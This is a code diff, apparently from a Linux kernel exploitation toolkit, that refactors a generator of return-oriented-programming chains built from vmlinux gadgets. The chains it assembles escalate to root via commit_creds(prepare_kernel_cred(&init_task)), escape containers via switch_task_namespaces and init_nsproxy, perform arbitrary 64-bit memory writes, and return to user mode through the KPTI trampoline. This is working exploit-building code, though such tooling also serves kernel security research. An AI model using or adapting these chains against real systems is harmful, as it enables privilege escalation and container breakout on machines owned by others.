16
16
from gadget_filter import GadgetFilter
17
17
18
18
sys .path .append (os .path .abspath (f"{ __file__ } /../.." ))
19
- from kxdb_tool .data_model .rop_chain import *
19
+ from kxdb_tool .data_model .rop_chain import RopChainConstant , RopChainOffset , RopChainArgument , RopAction , RopActions
20
20
from kxdb_tool .data_model .serialization import *
21
21
22
22
BIT_SIZE = 64
23
23
PREPARE_KERNEL_CRED = "prepare_kernel_cred"
24
- COMMIT_KERNEL_CRED = "commit_creds"
24
+ COMMIT_CREDS = "commit_creds"
25
25
INIT_CRED = "init_cred"
26
26
FIND_TASK_BY_VPID = "find_task_by_vpid"
27
27
SWITCH_TASK_NAMESPACES = "switch_task_namespaces"
@@ -52,13 +52,15 @@ def __init__(self, message):
52
52
class RopGeneratorAngrop :
53
53
"""Generates ROP chains using angrop."""
54
54
55
- def __init__ (self , vmlinux_path ) -> None :
55
+ def __init__ (self , vmlinux_path , rpp_cache ) -> None :
56
56
"""Initializes the ROP generator.
57
57
58
58
Args:
59
59
vmlinux_path: path to the vmlinux file
60
+ rpp_cache: path for a file where the output of rp++ can be cached
60
61
"""
61
62
self ._vmlinux_path = vmlinux_path
63
+ self ._rpp_cache = rpp_cache
62
64
63
65
# load angr on a stripped binary for speed
64
66
with tempfile .NamedTemporaryFile (delete = True ) as tmpfile :
@@ -109,7 +111,7 @@ def _find_rop_gadgets(self, rop):
109
111
110
112
This is done to avoid the slowness of analyzing the entire kernel binary with angrop
111
113
"""
112
- rop_backend = gadget_finder .RppBackend (self ._vmlinux_path , RPP_CONTEXT_SIZE )
114
+ rop_backend = gadget_finder .RppBackend (self ._vmlinux_path , RPP_CONTEXT_SIZE , self . _rpp_cache )
113
115
possible_gadgets = gadget_finder .find_gadgets (rop_backend )
114
116
logger .debug ("gadgets before filter: %d" , len (possible_gadgets ))
115
117
gadget_filter = GadgetFilter ()
@@ -152,9 +154,6 @@ def mov_reg_memory_writes(self):
152
154
"""
153
155
Finds gadgets that perform 'mov rdi, rax' which contain a memory write.
154
156
155
- Args:
156
- binary_path: Path to the binary file.
157
-
158
157
Returns:
159
158
A list of dictionaries, where each dictionary contains the gadget and the
160
159
address controller register for the memory write, or an empty list if none are found.
@@ -212,20 +211,20 @@ def _mov_rdi_rax(self):
212
211
chain_mov_regs = self ._rop .move_regs (** {"rdi" : "rax" })
213
212
except angrop .errors .RopException :
214
213
pass
214
+
215
215
if not chain_mov_regs :
216
216
chain_mov_regs = self .mov_reg_memory_writes ()
217
+
217
218
if not chain_mov_regs :
218
219
raise RopGeneratorError ("Unable to find a mov rdi, rax gadget." )
219
- items = []
220
+
220
221
for value , rebased in chain_mov_regs ._concretize_chain_values (): # pylint: disable=protected-access
221
222
if rebased :
222
- items . append ( RopChainOffset (
223
+ return RopChainOffset (
223
224
kernel_offset = value - KERNEL_BASE_ADDRESS ,
224
- description = f"mov rdi, rax" ))
225
+ description = f"mov rdi, rax" )
225
226
else :
226
- items .append (RopChainConstant (value ))
227
-
228
- return items
227
+ return RopChainConstant (value )
229
228
230
229
def find_memory_write (self ):
231
230
"""Finds the shortest ROP gadget with a single memory write where the address is controlled by 'rsi'
@@ -266,7 +265,7 @@ def build_rop_chain(self):
266
265
)
267
266
chain += self ._rop .move_regs (rdi = "rax" )
268
267
chain += self ._rop .func_call (
269
- self ._find_symbol_addr (COMMIT_KERNEL_CRED ), []
268
+ self ._find_symbol_addr (COMMIT_CREDS ), []
270
269
)
271
270
chain += self ._rop .func_call (
272
271
self ._find_symbol_addr (FIND_TASK_BY_VPID ), [1 ]
@@ -380,7 +379,6 @@ def rop_action_msleep(self, msecs: RopChainConstant | RopChainArgument):
380
379
RopChain: The constructed ROP chain to execute the `msleep` function.
381
380
"""
382
381
return RopAction (
383
- type_id = 0x01 ,
384
382
description = "msleep(ARG_time_msec)" ,
385
383
gadgets = [
386
384
self ._find_pop_one_reg ("rdi" ),
@@ -397,16 +395,17 @@ def rop_action_commit_creds(self):
397
395
items = [
398
396
self ._find_pop_one_reg ("rdi" ),
399
397
self ._find_symbol (INIT_CRED ),
400
- self ._find_symbol (COMMIT_KERNEL_CRED )
398
+ self ._find_symbol (PREPARE_KERNEL_CRED ),
399
+ self ._mov_rdi_rax (),
400
+ self ._find_symbol (COMMIT_CREDS )
401
401
]
402
402
403
403
return RopAction (
404
- type_id = 0x02 ,
405
- description = "commit_kernel_cred(prepare_kernel_cred(0))" ,
404
+ description = "commit_creds(prepare_kernel_cred(&init_task))" ,
406
405
gadgets = items )
407
406
408
407
def rop_action_switch_task_namespaces (self , vpid : RopChainConstant | RopChainArgument ):
409
- """Constructs a ROP action to call fswitch_task_namespaces .
408
+ """Constructs a ROP action to call switch_task_namespaces .
410
409
411
410
Returns:
412
411
RopChain: The constructed ROP chain.
@@ -415,17 +414,13 @@ def rop_action_switch_task_namespaces(self, vpid: RopChainConstant | RopChainArg
415
414
self ._find_pop_one_reg ("rdi" ),
416
415
vpid ,
417
416
self ._find_symbol (FIND_TASK_BY_VPID ),
418
- ]
419
-
420
- items .extend (self ._mov_rdi_rax ())
421
- items .extend ([
417
+ self ._mov_rdi_rax (),
422
418
self ._find_pop_one_reg ("rsi" ),
423
419
self ._find_symbol (INIT_NSPROXY ),
424
- ] )
425
- items . append ( self . _find_symbol ( SWITCH_TASK_NAMESPACES ))
420
+ self . _find_symbol ( SWITCH_TASK_NAMESPACES )
421
+ ]
426
422
427
423
return RopAction (
428
- type_id = 0x03 ,
429
424
description = "switch_task_namespaces(find_task_by_vpid(ARG_vpid), init_nsproxy)" ,
430
425
gadgets = items )
431
426
@@ -443,7 +438,6 @@ def rop_action_ret_via_kpti_retpoline(
443
438
RopChain: The constructed ROP chain.
444
439
"""
445
440
return RopAction (
446
- type_id = 0x07 ,
447
441
description = "ret_via_kpti_retpoline(ARG_user_rip, ARG_user_cs, ARG_user_rflags, ARG_user_sp, ARG_user_ss)" ,
448
442
gadgets = [
449
443
RopChainOffset (
@@ -465,7 +459,6 @@ def rop_action_fork(self):
465
459
RopChain: The constructed ROP chain.
466
460
"""
467
461
return RopAction (
468
- type_id = 0x05 ,
469
462
description = "fork()" ,
470
463
gadgets = [self ._find_symbol (FORK )])
471
464
@@ -483,7 +476,6 @@ def rop_action_telefork(self, msecs: RopChainConstant | RopChainArgument):
483
476
]
484
477
485
478
return RopAction (
486
- type_id = 0x06 ,
487
479
description = "telefork(ARG_sleep_msec)" ,
488
480
gadgets = items )
489
481
@@ -502,7 +494,6 @@ def rop_action_write_what_where_64(self, address, value):
502
494
description = "mov qword ptr [rsi], rdi" )]
503
495
504
496
return RopAction (
505
- type_id = 0x04 ,
506
497
description = "write_what_where_64(ARG_address, ARG_new_value)" ,
507
498
gadgets = items )
508
499
@@ -514,6 +505,7 @@ def rop_action_write_what_where_64(self, address, value):
514
505
parser .add_argument ("vmlinux_path" , help = "Path to vmlinux file" )
515
506
parser .add_argument ("--output" , choices = ["python" , "json" ], default = "python" )
516
507
parser .add_argument ("--json-indent" , type = int , default = None )
508
+ parser .add_argument ("--rpp-cache" , help = "Path to cache the output of r++" )
517
509
args = parser .parse_args ()
518
510
519
511
patched_vmlinux_path = pathlib .Path (
@@ -523,7 +515,7 @@ def rop_action_write_what_where_64(self, address, value):
523
515
if not patched_vmlinux_path .exists ():
524
516
RopInstructionPatcher (args .vmlinux_path ).apply_patches (patched_vmlinux_path )
525
517
526
- rop_generator = RopGeneratorAngrop (patched_vmlinux_path )
518
+ rop_generator = RopGeneratorAngrop (patched_vmlinux_path , args . rpp_cache )
527
519
action_sleep = rop_generator .rop_action_msleep (RopChainArgument (0 ))
528
520
action_commit_creds = rop_generator .rop_action_commit_creds ()
529
521
action_switch_task_namespace = rop_generator .rop_action_switch_task_namespaces (RopChainArgument (0 ))
0 commit comments